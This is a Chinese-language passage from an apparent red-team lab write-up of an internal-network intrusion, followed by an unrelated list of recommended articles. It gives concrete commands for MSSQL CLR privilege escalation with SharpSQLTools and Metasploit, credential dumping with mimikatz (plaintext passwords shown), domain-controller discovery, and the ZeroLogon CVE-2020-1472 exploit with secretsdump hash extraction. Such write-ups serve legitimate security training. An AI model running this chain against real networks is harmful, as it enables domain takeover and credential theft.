文章插图
MSF 配合 Proxifier 开启 socks 代理隧道, 利用 SharpSQLTools 执行命令, 发现是 10.10.10.18 机器是一个低权限的账号 network service .
文章插图
参考 MSSQL 利用 CLR 技术执行系统命令 中的方法, 进行 clr 提权, 成功提权到 system 权限.
SharpSQLTools.exe 10.10.10.18 sa sa master install_clrSharpSQLTools.exe 10.10.10.18 sa sa master enable_clrSharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami文章插图
利用
exploit/windows/mssql/mssql_clr_payload 模块, 先用低权限账号上线, 接着上传木马, 利用 SharpSQLTools 运行得到高权限.
文章插图
接着使用 mimikatz 抓取一下凭证, 得到两个用户的用户名和密码: Administrator:Admin12345 , sqlserver:Server12345 .
文章插图
域控由于不存在新的网段了, 在前面 fscan 的扫描结果中还存在一个 10.10.10.8 的地址, 不出意外该地址的机器就是域控了, 下面看看该如何拿下该台机子.
文章插图
先确定一下该台机器是否是域控制器, 常见的方法有:
- 扫描内网中同时开放 389 和 53 端口的机器.
- 查看域控制器组: net group "domain controllers" /domain .
文章插图
- 查看域控的机器名: nslookup redteam.red; nslookup -type=SRV _ldap._tcp .
文章插图
- 查看域控当前时间: net time /domain .
文章插图
确定该台机器是域控制器后, 根据其版本信息尝试用 Netlogon 特权提升漏洞 CVE-2020-1472 进行攻击, 详细内容见 内网渗透-账号提权 .
在验证存在 Netlogon 特权提升漏洞后, 先重置一下域账号, 置空密码: Python/ target=_blank class=infotextkey>Python cve-2020-1472-exploit.py OWA 10.10.10.8 .
文章插图
接着读取域控中的 hash : python secretsdump.py redteam.red/[email protected] -just-dc -no-pass .
推荐阅读
- 高速|女子打不到车雇电动车上高速:2人轮流骑 又累又热
- 袁泉|袁泉,终于从神坛上 下来了
- Java|Java:2022年招聘Java开发人员指南
- TikTok 乱拳打死老师傅:硅谷大厂还在发论文,它产品已经上线了
- 教师|农村学校招代课教师,招聘内容提到的“待遇从优”,到底有多优?
- 孩子打架家长正确处理
- 膝盖脂肪瘤应该怎么治疗?
- 孕12周双顶径看男女
- 汽车|上海修车店一天收20多辆“中暑”车:爆胎、打火机炸了玻璃
- 二十不惑2|《二十不惑2》:四姐妹职场打拼,传达正向价值观不如《少年派2》